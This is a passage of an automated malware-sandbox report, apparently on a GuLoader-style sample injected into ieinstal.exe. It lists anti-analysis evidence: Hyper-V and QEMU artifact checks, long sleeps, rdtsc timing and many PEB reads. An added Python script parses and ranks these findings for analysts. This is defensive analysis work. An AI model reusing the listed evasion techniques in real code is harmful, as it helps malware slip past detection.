Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: C:\Windows\explorer.exe TID: 3136 Thread sleep time: -234000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4528 Thread sleep time: -176000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll Jump to dropped file
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03CE40 rdtsc 27_2_1F03CE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7904 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 1.2 %
Source: C:\Windows\SysWOW64\chkdsk.exe API coverage: 2.7 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: ieinstal.exe, 0000001B.00000002.1969313540.000000000336E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1702123686.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1969849452.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1964744060.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1701619808.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832573001.000000000F713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2244636535.000000000F6FD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dllProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\iertutil.dll
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03CE40 rdtsc 27_2_1F03CE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug
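The evidence lines in this part of the report all share one flat format ("Source: <process or memory dump> <signature>: <payload>"), and the anti-analysis behaviour is spread across hundreds of near-identical entries: sleep requests compared against a threshold, an rdtsc timing check, strings naming Hyper-V integration services and the QEMU guest agent, and the long run of `mov eax, dword ptr fs:[00000030h]` entries that follows (on 32-bit Windows fs:[0x30] is the TEB's pointer to the PEB, which holds the BeingDebugged and NtGlobalFlag fields a loader checks before unpacking). The script below is an added example, not Joe Sandbox code and not part of this report: it parses lines of this format, strips the "Jump to behavior" link text, and aggregates PEB reads per function so the densest functions can be picked as the starting point in a disassembler. The sample lines are copied from this section; the VM/sandbox keyword list is this example's own assumption.

```python
"""Aggregate the per-line evidence of a Joe Sandbox behaviour report.

Added example: it understands the "Source: ..." line format seen in this
report and groups the anti-analysis evidence by process and function.
"""
import re
from collections import Counter

# Constructed input: evidence lines copied from the report above.
SAMPLE_LINES = [
    "Source: C:\\Windows\\explorer.exe TID: 3136 Thread sleep time: -234000s >= -30000s Jump to behavior",
    "Source: C:\\Windows\\SysWOW64\\chkdsk.exe TID: 4528 Thread sleep time: -176000s >= -30000s Jump to behavior",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 27_2_1F03CE40 rdtsc 27_2_1F03CE40",
    "Source: ieinstal.exe, 0000001B.00000002.1970398834.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat",
    "Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\\Program Files\\Qemu-ga\\qemu-ga.exe",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h] 27_2_1F03FF03",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h] 27_2_1F03FF03",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h] 27_2_1F048F3C",
]

# Link text left over from the HTML report; carries no information.
TRAILING_LINK = re.compile(r"\s+Jump to (?:behavior|dropped file)$")
# The source is either "<proc>, <dump id>" or a full path followed by a known signature label.
SOURCE = re.compile(
    r"^Source: (?P<src>.*?)(?:, |\s+(?=TID:|Code function:|Binary or memory string:"
    r"|Last function:|API coverage:|Window found:|Window / User API:"
    r"|Process information queried:|Process token adjusted:"
    r"|System information queried:|Dropped PE file))"
)
# "Code function: <id> <instruction> <id>": the function id is repeated at the end of the line.
CODE_FUNC = re.compile(r"Code function: (?P<func>\S+) (?P<instr>.+?) (?P=func)$")
SLEEP = re.compile(r"TID: (?P<tid>\d+) Thread sleep time: (?P<req>-?\d+)s >= (?P<thr>-?\d+)s$")
MEM_STRING = re.compile(r"Binary or memory string: (?P<s>.+)$")

PEB_ACCESS = "fs:[00000030h]"  # 32-bit TEB -> PEB pointer (BeingDebugged, NtGlobalFlag live in the PEB)
# Assumption: substrings of the VM/sandbox artifact strings that appear in this report.
VM_KEYWORDS = ("qemu-ga", "qga.exe", "vmic", "hyper-v")


def process_name(src):
    """Reduce a full path or 'proc.exe' to the lower-cased image name."""
    return src.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_line(line):
    """Return (process, kind, payload) for one evidence line, or None if it is not one."""
    line = TRAILING_LINK.sub("", line.strip())
    m = SOURCE.match(line)
    if not m:
        return None
    proc = process_name(m.group("src"))
    rest = line[m.end():]
    if (cf := CODE_FUNC.search(rest)):
        return proc, "code", (cf.group("func"), cf.group("instr"))
    if (sl := SLEEP.search(rest)):
        # The report prints the requested delay and the threshold it was compared against;
        # keep both as magnitudes so the comparison below is sign-independent.
        return proc, "sleep", (int(sl.group("tid")), abs(int(sl.group("req"))), abs(int(sl.group("thr"))))
    if (ms := MEM_STRING.search(rest)):
        return proc, "string", ms.group("s")
    return proc, "other", rest


def triage(lines):
    """Group the evidence: PEB reads per function, rdtsc functions, long sleeps, VM artifact strings."""
    peb_reads, rdtsc, long_sleeps, vm_artifacts = Counter(), set(), [], []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, kind, payload = parsed
        if kind == "code":
            func, instr = payload
            if PEB_ACCESS in instr:
                peb_reads[(proc, func)] += 1
            elif instr == "rdtsc":
                rdtsc.add((proc, func))
        elif kind == "sleep":
            tid, requested, threshold = payload
            if requested >= threshold:
                long_sleeps.append((proc, tid, requested, threshold))
        elif kind == "string" and any(k in payload.lower() for k in VM_KEYWORDS):
            vm_artifacts.append((proc, payload))
    return {"peb_reads": peb_reads, "rdtsc": rdtsc, "long_sleeps": long_sleeps, "vm_artifacts": vm_artifacts}


def rank_peb_functions(result, n=5):
    """Functions with the most PEB reads first: where to start reading in the disassembler."""
    return result["peb_reads"].most_common(n)


def summarize(result):
    """One line per finding, densest PEB-reading functions first."""
    out = [f"{p} {f}: {n} PEB read(s) via fs:[30h]" for (p, f), n in rank_peb_functions(result)]
    out += [f"{p} {f}: rdtsc timing check" for p, f in sorted(result["rdtsc"])]
    out += [f"{p} TID {t}: sleep {r} exceeds threshold {th}" for p, t, r, th in result["long_sleeps"]]
    out += [f"{p}: VM/sandbox artifact string {s!r}" for p, s in result["vm_artifacts"]]
    return "\n".join(out)


if __name__ == "__main__":
    print(summarize(triage(SAMPLE_LINES)))
```

Feeding the whole report through `triage` instead of the eight sample lines turns the wall of `fs:[00000030h]` entries into a short ranked list of functions in ieinstal.exe, which is the part of the injected GuLoader code worth opening first; the sleep and VM-string findings tell you which artifacts (Hyper-V integration services, qemu-ga) a sandbox would need to hide or rename for the sample to run to completion.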
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h] 27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h] 27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FF03 mov eax, dword ptr fs:[00000030h] 27_2_1F03FF03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCEF0 mov eax, dword ptr fs:[00000030h] 27_2_1EFBCEF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h] 27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h] 27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF1EED mov eax, dword ptr fs:[00000030h] 27_2_1EFF1EED
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094F1D mov eax, dword ptr fs:[00000030h] 27_2_1F094F1D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h] 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h] 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h] 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 mov eax, dword ptr fs:[00000030h] 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h] 27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h] 27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h] 27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F000F16 mov eax, dword ptr fs:[00000030h] 27_2_1F000F16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC3EE2 mov eax, dword ptr fs:[00000030h] 27_2_1EFC3EE2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFBED0 mov eax, dword ptr fs:[00000030h] 27_2_1EFFBED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h] 27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F3C mov eax, dword ptr fs:[00000030h] 27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h] 27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F3C mov ecx, dword ptr fs:[00000030h] 27_2_1F048F3C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h] 27_2_1EFF2EB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF2EB8 mov eax, dword ptr fs:[00000030h] 27_2_1EFF2EB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07BF4D mov eax, dword ptr fs:[00000030h] 27_2_1F07BF4D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 mov eax, dword ptr fs:[00000030h] 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07AF50 mov ecx, dword ptr fs:[00000030h] 27_2_1F07AF50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFCEA0 mov eax, dword ptr fs:[00000030h] 27_2_1EFFCEA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07EF66 mov eax, dword ptr fs:[00000030h] 27_2_1F07EF66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F016F70 mov eax, dword ptr fs:[00000030h] 27_2_1F016F70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094F7C mov eax, dword ptr fs:[00000030h] 27_2_1F094F7C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h] 27_2_1EFEAE89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEAE89 mov eax, dword ptr fs:[00000030h] 27_2_1EFEAE89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEBE80 mov eax, dword ptr fs:[00000030h] 27_2_1EFEBE80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC1E70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC1E70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF7E71 mov eax, dword ptr fs:[00000030h] 27_2_1EFF7E71
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h] 27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h] 27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F048F8B mov eax, dword ptr fs:[00000030h] 27_2_1F048F8B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFCE70 mov eax, dword ptr fs:[00000030h] 27_2_1EFFCE70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h] 27_2_1EFBBE60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBBE60 mov eax, dword ptr fs:[00000030h] 27_2_1EFBBE60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEEE48 mov eax, dword ptr fs:[00000030h] 27_2_1EFEEE48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBFE40 mov eax, dword ptr fs:[00000030h] 27_2_1EFBFE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h] 27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h] 27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBAE40 mov eax, dword ptr fs:[00000030h] 27_2_1EFBAE40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBDE45 mov eax, dword ptr fs:[00000030h] 27_2_1EFBDE45
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBDE45 mov ecx, dword ptr fs:[00000030h] 27_2_1EFBDE45
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFCE3F mov eax, dword ptr fs:[00000030h] 27_2_1EFFCE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F041FC9 mov eax, dword ptr fs:[00000030h] 27_2_1F041FC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2E32 mov eax, dword ptr fs:[00000030h] 27_2_1EFC2E32
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07EFD3 mov eax, dword ptr fs:[00000030h] 27_2_1F07EFD3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov ecx, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FFDC mov eax, dword ptr fs:[00000030h] 27_2_1F03FFDC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBBE18 mov ecx, dword ptr fs:[00000030h] 27_2_1EFBBE18
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h] 27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h] 27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC3E14 mov eax, dword ptr fs:[00000030h] 27_2_1EFC3E14
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF8E15 mov eax, dword ptr fs:[00000030h] 27_2_1EFF8E15
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094FFF mov eax, dword ptr fs:[00000030h] 27_2_1F094FFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6E00 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC3E01 mov eax, dword ptr fs:[00000030h] 27_2_1EFC3E01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE8FFB mov eax, dword ptr fs:[00000030h] 27_2_1EFE8FFB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094E03 mov eax, dword ptr fs:[00000030h] 27_2_1F094E03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h] 27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h] 27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h] 27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03FE1F mov eax, dword ptr fs:[00000030h] 27_2_1F03FE1F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD6FE0 mov eax, dword ptr fs:[00000030h] 27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD6FE0 mov ecx, dword ptr fs:[00000030h] 27_2_1EFD6FE0
